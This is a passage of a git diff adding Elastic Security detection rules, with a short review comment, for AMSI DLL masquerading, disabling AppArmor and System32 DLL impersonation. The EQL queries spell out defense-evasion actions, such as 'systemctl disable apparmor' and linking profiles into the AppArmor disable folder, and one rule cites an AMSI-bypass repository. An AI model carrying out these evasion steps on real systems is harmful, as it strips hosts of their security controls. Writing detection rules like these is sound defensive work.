This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\servicing\\\\LCU\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\")\n",
+ "references": [
+ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell"
+ ],
+ "related_integrations": [
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ },
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "fa488440-04cc-41d7-9279-539387bf2a17",
+ "severity": "high",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": 
"https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.001",
+ "name": "Disable or Modify Tools",
+ "reference": "https://attack.mitre.org/techniques/T1562/001/"
+ }
+ ]
+ },
+ {
+ "id": "T1574",
+ "name": "Hijack Execution Flow",
+ "reference": "https://attack.mitre.org/techniques/T1574/",
+ "subtechnique": [
+ {
+ "id": "T1574.001",
+ "name": "DLL Search Order Hijacking",
+ "reference": "https://attack.mitre.org/techniques/T1574/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 9
+ },
+ "id": "fa488440-04cc-41d7-9279-539387bf2a17_9",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_4.json b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_4.json
new file mode 100644
index 00000000000..d4d107e7d10
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_4.json
@@ -0,0 +1,98 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*",
+ "endgame-*",
+ "auditbeat-*",
+ "logs-auditd_manager.auditd-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Disabling of AppArmor",
+ "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\") and event.type == \"start\"\nand (\n (process.name == \"systemctl\" and process.args == \"disable\" and process.args == \"apparmor\") or\n (process.name == \"ln\" and process.args : \"/etc/apparmor.d/*\" and process.args == \"/etc/apparmor.d/disable/\")\n)\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "auditd_manager",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "fac52c69-2646-4e79-89c0-fd7653461010",
+ "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: Auditd Manager"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.001",
+ "name": "Disable or Modify Tools",
+ "reference": "https://attack.mitre.org/techniques/T1562/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 4
+ },
+ "id": "fac52c69-2646-4e79-89c0-fd7653461010_4",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_5.json b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_5.json
new file mode 100644
index 00000000000..75343b30d69
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_5.json
@@ -0,0 +1,98 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*",
+ "endgame-*",
+ "auditbeat-*",
+ "logs-auditd_manager.auditd-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Disabling of AppArmor",
+ "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and (\n (process.name == \"systemctl\" and process.args == \"disable\" and process.args == \"apparmor\") or\n (process.name == \"ln\" and process.args : \"/etc/apparmor.d/*\" and process.args == \"/etc/apparmor.d/disable/\")\n)\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "auditd_manager",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "fac52c69-2646-4e79-89c0-fd7653461010",
+ "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: Auditd Manager"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.001",
+ "name": "Disable or Modify Tools",
+ "reference": "https://attack.mitre.org/techniques/T1562/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 5
+ },
+ "id": "fac52c69-2646-4e79-89c0-fd7653461010_5",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_6.json b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_6.json
new file mode 100644
index 00000000000..c4e6eddba8b
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_6.json
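Review bot: The `systemctl` branch of the query matches `process.args` by exact equality with `apparmor`, so the same disable action issued with the fully qualified unit name (presumably `apparmor.service`, the usual systemd spelling) is not matched; the `_6.json` hunk below carries the identical condition. Keeping the exact-match style, `process.args in ("apparmor", "apparmor.service")` would cover both spellings without widening the `ln` branch. Since these files appear to be frozen per-version snapshots of the rule, the change belongs in a new rule version rather than in these hunks, and the rule's description could note the unit-name forms it is meant to catch.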
@@ -0,0 +1,98 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*",
+ "endgame-*",
+ "auditbeat-*",
+ "logs-auditd_manager.auditd-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Disabling of AppArmor",
+ "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and (\n (process.name == \"systemctl\" and process.args == \"disable\" and process.args == \"apparmor\") or\n (process.name == \"ln\" and process.args : \"/etc/apparmor.d/*\" and process.args == \"/etc/apparmor.d/disable/\")\n)\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "auditd_manager",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "fac52c69-2646-4e79-89c0-fd7653461010",
+ "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: Auditd Manager"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.001",
+ "name": "Disable or Modify Tools",
+ "reference": "https://attack.mitre.org/techniques/T1562/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 6
+ },
+ "id": "fac52c69-2646-4e79-89c0-fd7653461010_6",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_103.json b/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_103.json
new file mode 100644
index 00000000000..88000b33bc9
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_103.json
@@ -0,0 +1,138 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "building_block_type": "default",
+ "description": "Identifies suspicious instances of default system32 DLLs either unsigned or signed with non-MS certificates. This can potentially indicate the attempt to masquerade as system DLLs, perform DLL Search Order Hijacking or backdoor and resign legitimate DLLs.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Masquerading as System32 DLL",
+ "query": "library where event.action == \"load\" and dll.Ext.relative_file_creation_time <= 3600 and\n not (\n dll.path : (\n \"?:\\\\Windows\\\\System32\\\\*\",\n \"?:\\\\Windows\\\\SysWOW64\\\\*\",\n \"?:\\\\Windows\\\\SystemTemp\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\System32\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\",\n \"?:\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\",\n \"?:\\\\Windows\\\\assembly\\\\NativeImages_v*\"\n )\n ) and\n not (\n dll.code_signature.subject_name in (\n \"Microsoft Windows\",\n \"Microsoft Corporation\",\n \"Microsoft Windows Hardware Abstraction Layer Publisher\",\n \"Microsoft Windows Publisher\",\n \"Microsoft Windows 3rd party Component\",\n \"Microsoft 3rd Party Application Component\"\n ) and dll.code_signature.trusted == true\n ) and not dll.code_signature.status : (\"errorCode_endpoint*\", \"errorUntrustedRoot\", \"errorChaining\") and\n dll.name : (\n \"aadauthhelper.dll\", \"aadcloudap.dll\", \"aadjcsp.dll\", \"aadtb.dll\", \"aadwamextension.dll\", \"aarsvc.dll\", \"abovelockapphost.dll\", \"accessibilitycpl.dll\", \"accountaccessor.dll\", \"accountsrt.dll\", \"acgenral.dll\", \"aclayers.dll\", \"acledit.dll\", \"aclui.dll\", \"acmigration.dll\", \"acppage.dll\", \"acproxy.dll\", \"acspecfc.dll\", 
\"actioncenter.dll\", \"actioncentercpl.dll\", \"actionqueue.dll\", \"activationclient.dll\", \"activeds.dll\", \"activesynccsp.dll\", \"actxprxy.dll\", \"acwinrt.dll\", \"acxtrnal.dll\", \"adaptivecards.dll\", \"addressparser.dll\", \"adhapi.dll\", \"adhsvc.dll\", \"admtmpl.dll\", \"adprovider.dll\", \"adrclient.dll\", \"adsldp.dll\", \"adsldpc.dll\", \"adsmsext.dll\", \"adsnt.dll\", \"adtschema.dll\", \"advancedemojids.dll\", \"advapi32.dll\", \"advapi32res.dll\", \"advpack.dll\", \"aeevts.dll\", \"aeinv.dll\", \"aepic.dll\", \"ajrouter.dll\", \"altspace.dll\", \"amsi.dll\", \"amsiproxy.dll\", \"amstream.dll\", \"apds.dll\", \"aphostclient.dll\", \"aphostres.dll\", \"aphostservice.dll\", \"apisampling.dll\", \"apisetschema.dll\", \"apmon.dll\", \"apmonui.dll\", \"appcontracts.dll\", \"appextension.dll\", \"apphelp.dll\", \"apphlpdm.dll\", \"appidapi.dll\", \"appidsvc.dll\", \"appinfo.dll\", \"appinfoext.dll\", \"applicationframe.dll\", \"applockercsp.dll\", \"appmgmts.dll\", \"appmgr.dll\", \"appmon.dll\", \"appointmentapis.dll\", \"appraiser.dll\", \"appreadiness.dll\", \"apprepapi.dll\", \"appresolver.dll\", \"appsruprov.dll\", \"appvcatalog.dll\", \"appvclientps.dll\", \"appvetwclientres.dll\", \"appvintegration.dll\", \"appvmanifest.dll\", \"appvpolicy.dll\", \"appvpublishing.dll\", \"appvreporting.dll\", \"appvscripting.dll\", \"appvsentinel.dll\", \"appvstreamingux.dll\", \"appvstreammap.dll\", \"appvterminator.dll\", \"appxalluserstore.dll\", \"appxpackaging.dll\", \"appxsip.dll\", \"appxsysprep.dll\", \"archiveint.dll\", \"asferror.dll\", \"aspnet_counters.dll\", \"asycfilt.dll\", \"atl.dll\", \"atlthunk.dll\", \"atmlib.dll\", \"audioeng.dll\", \"audiohandlers.dll\", \"audiokse.dll\", \"audioses.dll\", \"audiosrv.dll\", \"auditcse.dll\", \"auditpolcore.dll\", \"auditpolmsg.dll\", \"authbroker.dll\", \"authbrokerui.dll\", \"authentication.dll\", \"authext.dll\", \"authfwcfg.dll\", \"authfwgp.dll\", \"authfwsnapin.dll\", \"authfwwizfwk.dll\", 
\"authhostproxy.dll\", \"authui.dll\", \"authz.dll\", \"autopilot.dll\", \"autopilotdiag.dll\", \"autoplay.dll\", \"autotimesvc.dll\", \"avicap32.dll\", \"avifil32.dll\", \"avrt.dll\", \"axinstsv.dll\", \"azroles.dll\", \"azroleui.dll\", \"azsqlext.dll\", \"basecsp.dll\", \"basesrv.dll\", \"batmeter.dll\", \"bcastdvrbroker.dll\", \"bcastdvrclient.dll\", \"bcastdvrcommon.dll\", \"bcd.dll\", \"bcdprov.dll\", \"bcdsrv.dll\", \"bcp47langs.dll\", \"bcp47mrm.dll\", \"bcrypt.dll\", \"bcryptprimitives.dll\", \"bdehdcfglib.dll\", \"bderepair.dll\", \"bdesvc.dll\", \"bdesysprep.dll\", \"bdeui.dll\", \"bfe.dll\", \"bi.dll\", \"bidispl.dll\", \"bindfltapi.dll\", \"bingasds.dll\", \"bingfilterds.dll\", \"bingmaps.dll\", \"biocredprov.dll\", \"bisrv.dll\", \"bitlockercsp.dll\", \"bitsigd.dll\", \"bitsperf.dll\", \"bitsproxy.dll\", \"biwinrt.dll\", \"blbevents.dll\", \"blbres.dll\", \"blb_ps.dll\", \"bluetoothapis.dll\", \"bnmanager.dll\", \"bootmenuux.dll\", \"bootstr.dll\", \"bootux.dll\", \"bootvid.dll\", \"bridgeres.dll\", \"brokerlib.dll\", \"browcli.dll\", \"browserbroker.dll\", \"browseui.dll\", \"btagservice.dll\", \"bthavctpsvc.dll\", \"bthavrcp.dll\", \"bthavrcpappsvc.dll\", \"bthci.dll\", \"bthpanapi.dll\", \"bthradiomedia.dll\", \"bthserv.dll\", \"bthtelemetry.dll\", \"btpanui.dll\", \"bwcontexthandler.dll\", \"cabapi.dll\", \"cabinet.dll\", \"cabview.dll\", \"callbuttons.dll\", \"cameracaptureui.dll\", \"capauthz.dll\", \"capiprovider.dll\", \"capisp.dll\", \"captureservice.dll\", \"castingshellext.dll\", \"castlaunch.dll\", \"catsrv.dll\", \"catsrvps.dll\", \"catsrvut.dll\", \"cbdhsvc.dll\", \"cca.dll\", \"cdd.dll\", \"cdosys.dll\", \"cdp.dll\", \"cdprt.dll\", \"cdpsvc.dll\", \"cdpusersvc.dll\", \"cemapi.dll\", \"certca.dll\", \"certcli.dll\", \"certcredprovider.dll\", \"certenc.dll\", \"certenroll.dll\", \"certenrollui.dll\", \"certmgr.dll\", \"certpkicmdlet.dll\", \"certpoleng.dll\", \"certprop.dll\", \"cewmdm.dll\", \"cfgbkend.dll\", \"cfgmgr32.dll\", 
\"cfgspcellular.dll\", \"cfgsppolicy.dll\", \"cflapi.dll\", \"cfmifs.dll\", \"cfmifsproxy.dll\", \"chakra.dll\", \"chakradiag.dll\", \"chakrathunk.dll\", \"chartv.dll\", \"chatapis.dll\", \"chkwudrv.dll\", \"chsstrokeds.dll\", \"chtbopomofods.dll\", \"chtcangjieds.dll\", \"chthkstrokeds.dll\", \"chtquickds.dll\", \"chxapds.dll\", \"chxdecoder.dll\", \"chxhapds.dll\", \"chxinputrouter.dll\", \"chxranker.dll\", \"ci.dll\", \"cic.dll\", \"cimfs.dll\", \"circoinst.dll\", \"ciwmi.dll\", \"clb.dll\", \"clbcatq.dll\", \"cldapi.dll\", \"cleanpccsp.dll\", \"clfsw32.dll\", \"cliconfg.dll\", \"clipboardserver.dll\", \"clipc.dll\", \"clipsvc.dll\", \"clipwinrt.dll\", \"cloudap.dll\", \"cloudidsvc.dll\", \"clrhost.dll\", \"clusapi.dll\", \"cmcfg32.dll\", \"cmdext.dll\", \"cmdial32.dll\", \"cmgrcspps.dll\", \"cmifw.dll\", \"cmintegrator.dll\", \"cmlua.dll\", \"cmpbk32.dll\", \"cmstplua.dll\", \"cmutil.dll\", \"cngcredui.dll\", \"cngprovider.dll\", \"cnvfat.dll\", \"cofiredm.dll\", \"colbact.dll\", \"colorcnv.dll\", \"colorui.dll\", \"combase.dll\", \"comcat.dll\", \"comctl32.dll\", \"comdlg32.dll\", \"coml2.dll\", \"comppkgsup.dll\", \"compstui.dll\", \"computecore.dll\", \"computenetwork.dll\", \"computestorage.dll\", \"comrepl.dll\", \"comres.dll\", \"comsnap.dll\", \"comsvcs.dll\", \"comuid.dll\", \"configmanager2.dll\", \"conhostv1.dll\", \"connect.dll\", \"consentux.dll\", \"consentuxclient.dll\", \"console.dll\", \"consolelogon.dll\", \"contactapis.dll\", \"container.dll\", \"coredpus.dll\", \"coreglobconfig.dll\", \"coremas.dll\", \"coremessaging.dll\", \"coremmres.dll\", \"coreshell.dll\", \"coreshellapi.dll\", \"coreuicomponents.dll\", \"correngine.dll\", \"courtesyengine.dll\", \"cpfilters.dll\", \"creddialogbroker.dll\", \"credprovhelper.dll\", \"credprovhost.dll\", \"credprovs.dll\", \"credprovslegacy.dll\", \"credssp.dll\", \"credui.dll\", \"crypt32.dll\", \"cryptbase.dll\", \"cryptcatsvc.dll\", \"cryptdlg.dll\", \"cryptdll.dll\", \"cryptext.dll\", \"cryptnet.dll\", 
\"cryptngc.dll\", \"cryptowinrt.dll\", \"cryptsp.dll\", \"cryptsvc.dll\", \"crypttpmeksvc.dll\", \"cryptui.dll\", \"cryptuiwizard.dll\", \"cryptxml.dll\", \"cscapi.dll\", \"cscdll.dll\", \"cscmig.dll\", \"cscobj.dll\", \"cscsvc.dll\", \"cscui.dll\", \"csplte.dll\", \"cspproxy.dll\", \"csrsrv.dll\", \"cxcredprov.dll\", \"c_g18030.dll\", \"c_gsm7.dll\", \"c_is2022.dll\", \"c_iscii.dll\", \"d2d1.dll\", \"d3d10.dll\", \"d3d10core.dll\", \"d3d10level9.dll\", \"d3d10warp.dll\", \"d3d10_1.dll\", \"d3d10_1core.dll\", \"d3d11.dll\", \"d3d11on12.dll\", \"d3d12.dll\", \"d3d12core.dll\", \"d3d8thk.dll\", \"d3d9.dll\", \"d3d9on12.dll\", \"d3dscache.dll\", \"dab.dll\", \"dabapi.dll\", \"daconn.dll\", \"dafbth.dll\", \"dafdnssd.dll\", \"dafescl.dll\", \"dafgip.dll\", \"dafiot.dll\", \"dafipp.dll\", \"dafmcp.dll\", \"dafpos.dll\", \"dafprintprovider.dll\", \"dafupnp.dll\", \"dafwcn.dll\", \"dafwfdprovider.dll\", \"dafwiprov.dll\", \"dafwsd.dll\", \"damediamanager.dll\", \"damm.dll\", \"das.dll\", \"dataclen.dll\", \"datusage.dll\", \"davclnt.dll\", \"davhlpr.dll\", \"davsyncprovider.dll\", \"daxexec.dll\", \"dbgcore.dll\", \"dbgeng.dll\", \"dbghelp.dll\", \"dbgmodel.dll\", \"dbnetlib.dll\", \"dbnmpntw.dll\", \"dciman32.dll\", \"dcntel.dll\", \"dcomp.dll\", \"ddaclsys.dll\", \"ddcclaimsapi.dll\", \"ddds.dll\", \"ddisplay.dll\", \"ddoiproxy.dll\", \"ddores.dll\", \"ddpchunk.dll\", \"ddptrace.dll\", \"ddputils.dll\", \"ddp_ps.dll\", \"ddraw.dll\", \"ddrawex.dll\", \"defragproxy.dll\", \"defragres.dll\", \"defragsvc.dll\", \"deploymentcsps.dll\", \"deskadp.dll\", \"deskmon.dll\", \"desktopshellext.dll\", \"devenum.dll\", \"deviceaccess.dll\", \"devicecenter.dll\", \"devicecredential.dll\", \"devicepairing.dll\", \"deviceuxres.dll\", \"devinv.dll\", \"devmgr.dll\", \"devobj.dll\", \"devpropmgr.dll\", \"devquerybroker.dll\", \"devrtl.dll\", \"dfdts.dll\", \"dfscli.dll\", \"dfshim.dll\", \"dfsshlex.dll\", \"dggpext.dll\", \"dhcpcmonitor.dll\", \"dhcpcore.dll\", \"dhcpcore6.dll\", 
